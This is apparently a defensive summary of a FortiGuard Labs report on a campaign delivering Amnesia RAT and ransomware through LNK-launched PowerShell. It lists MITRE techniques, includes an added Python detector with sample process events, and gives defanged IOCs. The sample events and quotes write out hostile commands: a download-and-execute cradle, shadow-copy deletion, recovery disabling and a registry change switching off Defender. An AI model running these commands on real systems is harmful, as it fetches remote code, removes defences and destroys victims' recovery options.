FortiGuard Labs describes a multi-stage Windows-focused campaign that uses social-engineered archives and LNK-triggered PowerShell to deploy staged loaders, abuse Defendnot to disable Microsoft Defender, install Amnesia RAT for extensive data theft and surveillance, and finally deliver Hakuna Matata–derived ransomware and a WinLocker to encrypt and lock victims’ systems. The operation leverages GitHub and Dropbox for modular hosting and the Telegram Bot API for C2 and exfiltration, while using registry and policy manipulation to suppress defenses and destroy recovery options. #Defendnot #AmnesiaRAT
Keypoints
- Initial infection is user-driven: a compressed archive with decoy business documents contains an LNK shortcut that launches PowerShell to retrieve a first-stage loader from GitHub.
- The first-stage PowerShell loader (kira.ps1) hides execution, creates decoy documents, notifies the attacker via Telegram Bot API, and retrieves an obfuscated VBScript (SCRRC4ryuk.vbe) for in-memory reconstruction of core logic.
- Defensive neutralization combines PowerShell commands, registry policy changes, and operational abuse of the Defendnot tool to register a fake AV and force Microsoft Defender offline.
- Surveillance and data collection include system profiling, periodic screenshot capture (TelegramWorker.scr), clipboard monitoring, and deployment of Amnesia RAT (svchost.scr) to steal browser credentials, Telegram sessions, cryptocurrency data, and more.
- Recovery and response are suppressed by disabling administrative tools, deleting backups and shadow copies, hijacking file associations to prevent application execution, and deploying WinLocker and Hakuna Matata–derived ransomware that encrypts files and replaces desktop wallpaper with ransom messaging.
- Attack infrastructure is modular and resilient: scripts and decoys hosted on GitHub, binaries on Dropbox, and exfiltration/C2 conducted via Telegram Bot API and third-party file hosting.
MITRE Techniques
- [T1566.001] Phishing: Attachment – Delivery of malicious LNK and decoy documents inside a compressed archive masquerading as business files. [‘The archive contains multiple decoy documents… The primary malicious file within the archive is the LNK shortcut Задание_для_бухгалтера_02отдела.txt.lnk’]
- [T1059.001] Command and Scripting Interpreter: PowerShell – LNK launches PowerShell with execution policy bypass to download and execute the first-stage script. [‘-ExecutionPolicy Bypass -Command “irm … | iex”’]
- [T1059.005] Command and Scripting Interpreter: VBScript – An obfuscated VBScript (SCRRC4ryuk.vbe) is used as the orchestrator and reconstructs payloads in memory. [‘SCRRC4ryuk.vbe serves as the central orchestrator… fragments are concatenated at runtime and passed through a custom decoding routine’]
- [T1562.001] Impair Defenses: Disable or Modify Tools – The campaign systematically disables Microsoft Defender features via PowerShell and registry policy modifications. [‘disables Microsoft Defender real-time monitoring… writes multiple policy-controlled registry values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender’]
- [T1562.004] Impair Defenses: Disable or Modify System Firewall / AV – Operational abuse of Defendnot to register a fake antivirus with Windows Security Center causing Defender to disable itself. [‘The loader injects the Defendnot DLL into the Microsoft-signed… Taskmgr.exe… registers a fake antivirus product with the Windows Security Center’]
- [T1027] Obfuscated / Encrypted Files or Information – Use of Script Encoder Plus, Base64, and RC4 to hide VBScript and payload logic, keeping final logic in-memory. [‘SCRRC4ryuk.vbe is written in a fully encoded form generated using Script Encoder Plus… Base64 decoding and then decrypts… with RC4’]
- [T1218] Signed Binary Proxy Execution – Injection of Defendnot into a Microsoft-signed trusted process (Taskmgr.exe) to execute within a trusted context. [‘injects the Defendnot DLL into the Microsoft-signed, trusted system process Taskmgr.exe by default’]
- [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – Repeated ShellExecute with the runas verb and monitoring for cmd.exe to obtain elevated privileges. [‘enters a persistent User Account Control (UAC) escalation loop… relaunches itself via ShellExecute with the runas verb… queries active processes… checking for the presence of cmd.exe’]
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence via HKCU\Software\Microsoft\Windows\CurrentVersion\Run and copying payloads to the user Startup folder. [‘the file is copied to %PROGRAMDATA% and the user’s Startup folder, and persistence is established via a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run’]
- [T1082] System Information Discovery – Collection of OS, hardware, domain, user, and network information for profiling and attacker situational awareness. [‘gather detailed host, hardware, user, network, and security-related information and transmit it to the attacker via the Telegram Bot API’]
- [T1057] Process Discovery – Enumeration of running processes via WMI to control execution flow and avoid duplicate components. [‘queries running processes via WMI to determine whether a process named install.exe is already active’]
- [T1113] Screen Capture – Periodic screenshot capture (up to ~30 images) by TelegramWorker.scr and exfiltration via Telegram. [‘it enters a capture loop with a limit of 30 iterations… each image is then transmitted to the attacker via the Telegram Bot API’]
- [T1056.001] Input Capture: Clipboard Data – Clipboard monitoring to capture seed phrases and intercept cryptocurrency addresses. [‘monitors clipboard contents in real time to intercept 12-, 18-, or 24-word recovery phrases’]
- [T1555] Credentials from Password Stores – Extraction and decryption of browser-saved credentials and session data using Local State and DPAPI. [‘decrypts by retrieving the browser master key from the Local State file and invoking Windows DPAPI to recover plaintext secrets’]
- [T1539] Steal Web Session Cookie – Theft of browser cookies and session tokens to enable account takeover. [‘extracts saved passwords, cookies, session tokens…’]
- [T1098] Account Manipulation – Telegram Desktop session hijacking via theft of tdata artifacts enabling takeover without credentials. [‘explicitly targets Telegram Desktop by stealing local session artifacts from the tdata directory’]
- [T1102.002] Web Service: External Web Services – Use of Telegram Bot API for C2 and data exfiltration. [‘sends an execution confirmation to the attacker using the Telegram Bot API’]
- [T1071.001] Application Layer Protocol: Web Protocols – HTTPS-based communications to Telegram and third-party file hosting for uploads and C2. [‘Exfiltration is primarily performed over HTTPS using Telegram Bot APIs… larger datasets may be uploaded to third-party file-hosting services’]
- [T1041] Exfiltration Over C2 Channel – Data and artifacts sent directly through the Telegram Bot API to the attacker. [‘Data sent directly through Telegram Bot APIs’]
- [T1567.002] Exfiltration Over Web Service – Use of third-party file hosting (e.g., GoFile) for transferring larger datasets. [‘larger datasets may be uploaded to third-party file-hosting services such as GoFile’]
- [T1486] Data Encrypted for Impact – Hakuna Matata–derived ransomware encrypts hundreds of file types and renames encrypted files with @NeverMind12F. [‘The WmiPrvSE.scr payload represents the ransomware stage… Encrypted files are renamed with the custom extension @NeverMind12F’]
- [T1490] Inhibit System Recovery – Disabling Windows Recovery Environment, deleting backup catalog, and removing VSS snapshots to prevent restoration. [‘disables the Windows Recovery Environment using reagentc /disable… deletes the Windows Backup catalog… vssadmin delete shadows /all /quiet’]
- [T1489] Service Stop – Termination of database, office, email, virtualization, and security-related processes before encryption. [‘terminates processes associated with databases, office software, email clients, virtualization platforms, and security tools before rescanning and encrypting remaining files’]
- [T1491.001] Defacement: Internal – Replacement of desktop wallpaper and embedding ransom messaging across UI components. [‘drops a ransom note named ЧИТАЙМЕНЯ.txt… replaces the desktop wallpaper with a ransom image generated on the fly’]
- [T1499] Endpoint Denial of Service – WinLocker enforces a full desktop lock and file association hijacking prevents application execution. [‘WinLocker creates a mutex… and enforces a full desktop lock… file association hijacking … opening these files launches a command shell that displays a message instructing the victim to contact the attacker via Telegram’]
- [T1565.001] Stored Data Manipulation – Clipboard hijacking to replace cryptocurrency addresses with attacker-controlled values. [‘actively monitors and hijacks clipboard contents, replacing cryptocurrency wallet addresses with attacker-controlled values’]
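As an added example (not code from the FortiGuard Labs report), the following Python detector runs three of the process-level signals listed above (the LNK-spawned PowerShell download cradle, Defender policy-key modification, and recovery inhibition via vssadmin/wbadmin/reagentc) over constructed Sysmon-style process-creation events. The event shape, file paths and the placeholder download URL are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not from the report); the
# command lines mirror the techniques the summary describes.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass '
                '-Command "irm https://raw.githubusercontent.com/EXAMPLE/kira.ps1 | iex"'},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reagentc.exe",
     "cmdline": "reagentc /disable"},
    {"id": 4, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" '
                r'/v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"id": 5, "parent": r"C:\Windows\explorer.exe",  # benign control event
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]

# (rule name, parent-image regex or None, command-line regex)
RULES = [
    ("T1566.001/T1059.001 LNK-spawned PowerShell download cradle",
     re.compile(r"\\explorer\.exe$", re.I),  # shortcut double-click: explorer.exe parent
     re.compile(r"powershell.*-executionpolicy\s+bypass.*"
                r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b.*\|\s*iex", re.I)),
    ("T1562.001 Defender policy key modified", None,
     re.compile(r"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender", re.I)),
    ("T1490 shadow copies or backup catalog deleted", None,
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("T1490 Windows Recovery Environment disabled", None,
     re.compile(r"reagentc(\.exe)?\s+/disable", re.I)),
]


def match_events(events):
    """Return (event id, rule name) pairs; a rule fires only when its parent
    condition (if any) and its command-line pattern both match."""
    hits = []
    for ev in events:
        for name, parent_re, cmd_re in RULES:
            if parent_re and not parent_re.search(ev["parent"]):
                continue
            if cmd_re.search(ev["cmdline"]):
                hits.append((ev["id"], name))
    return hits
```

Feeding real Sysmon Event ID 1 records into `match_events` only requires mapping ParentImage and CommandLine onto the `parent` and `cmdline` keys.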
Indicators of Compromise
- [URL] Hosting and delivery – hxxps://github[.]com/Mafin111/MafinREP111 (GitHub raw URLs used to host scripts/installers), hxxps://dl.dropboxusercontent.com/…/svchost.scr (Dropbox link hosting Amnesia RAT binary), and other hosted payload URLs
- [LNK Hash] Initial shortcut used to trigger PowerShell – 7b8cf0ef390a7d6126c5e7bf835af5c5ce32c70c0d58ca4ddc9c238b2d3f059a (LNK that launches PowerShell to retrieve kira.ps1)
- [Script Hash] Stage loader script – 1828614be6d9bdd92f7ee30e12c8aac8eba33a6df2c92995f9bf930c3f1b992b3aa6ebb73390d304eef8fd897994906c05f3e967f8f6f6a7904c6156cf8819f9263b5ba921e478215dc9e3a397157badab415fc775cfb4681821b7446c14fb1a5443232a367a83ac2899b37c066dae3ec2010df292291db24ce3d744133218a6 (kira.ps1 / staged script content hash)
- [Payload Hash] Binary payload sample – 359fe8df31c903153667fbe93795929ad6172540b3ee7f9eff4bcc1da6d084786222775b877b4be4f5407525d52c5889739b96c302e5a204ef369b4a51c6dab271069a5d2a80a047ca36ca82e630d353829726d4f03a74c7522b7700c5c2bb5945e942ba59f3876b263a03ed7e5d5b1b250e84a0a4b4093b3c13b5fca4e12b21e6ca6bab85ae1eff08a59b46b7905ae0568110da172dec8367f32779094bdd087de56603a7b41fca9313231df6105dbb8148d3b0d80dfbc00e71e1d88f871915 (sample payload hash for RAT/ransomware binaries)
- [File Names] Key files observed – svchost.scr (Amnesia RAT binary hosted on Dropbox), install.exe (visual decoy .NET executable dropped to %PROGRAMDATA%), and other artifacts such as TelegramWorker.scr, defendnot.dll, defendnot-loader.exe, WmiPrvSE.scr, gedion.scr